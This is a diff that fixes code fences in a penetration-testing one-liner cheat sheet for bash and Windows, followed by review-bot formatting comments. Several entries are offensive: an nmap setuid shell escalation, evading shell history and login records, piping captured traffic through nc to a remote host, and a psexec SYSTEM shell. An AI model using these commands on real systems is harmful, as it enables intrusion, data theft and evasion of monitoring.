diff --git a/scripting/bash.md b/scripting/bash.md index 9560168..37dd3f3 100644 --- a/scripting/bash.md +++ b/scripting/bash.md 
@@ -5,76 +5,94 @@ One liners **Resolve a list of hostnames to IP addresses** ```bash -awk < hostnames.txt '{ system("resolveip -s " $1) }'``` +awk < hostnames.txt '{ system("resolveip -s " $1) }' +``` **IIS 6.0 IP Disclosure** ```bash -curl -l -O -H "Host:" "example.com"``` +curl -l -O -H "Host:" "example.com" +``` **Connect to SSL websites** ```bash -openssl s_client -connect example.com:443``` +openssl s_client -connect example.com:443 +``` **Convert base64 to text** ```bash -echo 'base64string' | base64 -d (Use -D on OSX)``` +echo 'base64string' | base64 -d (Use -D on OSX) +``` **Decode ASCII shellcode** ```bash -echo -e *shellcode hex string* (may need to use -i to ignore bad chars)``` +echo -e *shellcode hex string* (may need to use -i to ignore bad chars) +``` **Enumerate DNS of Class C** ```bash -for ip in $(seq 1 254); do; host 10.1.1.$ip | grep "name pointer"; done``` +for ip in $(seq 1 254); do; host 10.1.1.$ip | grep "name pointer"; done +``` **SSH to box and hide from "who" and "lastlog"** ```bash -ssh andrew@10.1.1.1 -T /bin/bash``` +ssh andrew@10.1.1.1 -T /bin/bash +``` **Prevent terminal logging** ```bash -unset HISTFILE``` +unset HISTFILE +``` **Add immutable attribute to a unix file** ```bash -chattr +i *file*``` +chattr +i *file* +``` **SSH into host2 through host1** ```bash -ssh -o "proxycommand ssh -W host2 host1" host2``` +ssh -o "proxycommand ssh -W host2 host1" host2 +``` **Nmap setuid privesc** ```bash nmap --script <(echo 'os.execute("/bin/sh")') -nmap --interactive (for older versions)``` +nmap --interactive (for older versions) +``` **Transfer files through SSH** ```bash -ssh test@10.1.1.1 "cat test.tar.gz" > test.tar.gz``` +ssh test@10.1.1.1 "cat test.tar.gz" > test.tar.gz +``` **Internal port redirect for bypassing services** ```bash -iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 4444``` +iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 4444 +``` **Enable forwarding on the fly** ```bash 
-sysctl -w net.ipv4.ip_forward=1``` +sysctl -w net.ipv4.ip_forward=1 +``` **Kill with USR1 developer defined signal** ```bash -kill -USR1 ``` +kill -USR1 +``` **Pull IP addresses from a file** ```bash -grep -E -o '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}'``` +grep -E -o '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' +``` **Sniff traffic with tcpdump and send to remote tcp socket** ```bash -tcpdump -w - | nc -v 8.8.8.8 9999``` +tcpdump -w - | nc -v 8.8.8.8 9999 +``` **Recursively search for files within a directory** ```bash zcat -rf ./* | grep "searchstring" +``` Credits ----------- diff --git a/scripting/windows.md b/scripting/windows.md index 571e2c3..1d76902 100644 --- a/scripting/windows.md +++ b/scripting/windows.md @@ -5,12 +5,19 @@ One liners **Tunnel traffic natively with windows** ```bash netsh int portproxy v4tov4 listenport=80 connecthost=10.0.0.1 connectport=80 +``` **Launch cmd.exe as local system w/ psexec** +```bash psexec -s cmd.exe +``` **Enable rdp with CLI** +```bash reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f +``` **Launch ARP scan** +```bash for /L %i in (1,1,255) do @start /b ping -n 1 -w 1 192.168.1.%i +``` \ No newline at end of file
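Review bot: in the bash.md hunk, several entries still carry prose inside the fenced block, so the closing-fence fix does not make them copy-pasteable. `echo 'base64string' | base64 -d (Use -D on OSX)` and `echo -e *shellcode hex string* (may need to use -i to ignore bad chars)` both put a parenthetical note on the command line; move each note to a sentence after the closing fence, as the other entries do. While touching this file, note that `for ip in $(seq 1 254); do; host 10.1.1.$ip ...` uses the zsh form `do;`, which bash rejects as a syntax error; in a `bash` fence it should read `do host ...`. Finally, `kill -USR1` is left with no target and an empty placeholder; the other entries mark such arguments, so a `<pid>` placeholder would make it consistent.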
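Review bot: in the windows.md hunk, the newly added fences are tagged `bash`, but every command in this file is a Windows cmd.exe line (`netsh int portproxy ...`, `reg add ...`, `for /L %i in (1,1,255) do @start /b ping ...`); `for /L` and `%i` are cmd syntax and will not run in bash, so tag these fences `cmd` or `batch` (or leave them untagged) so readers and syntax highlighters are not misled. Also, the hunk ends with `\ No newline at end of file` after the last closing fence; add a trailing newline so the final fence is terminated.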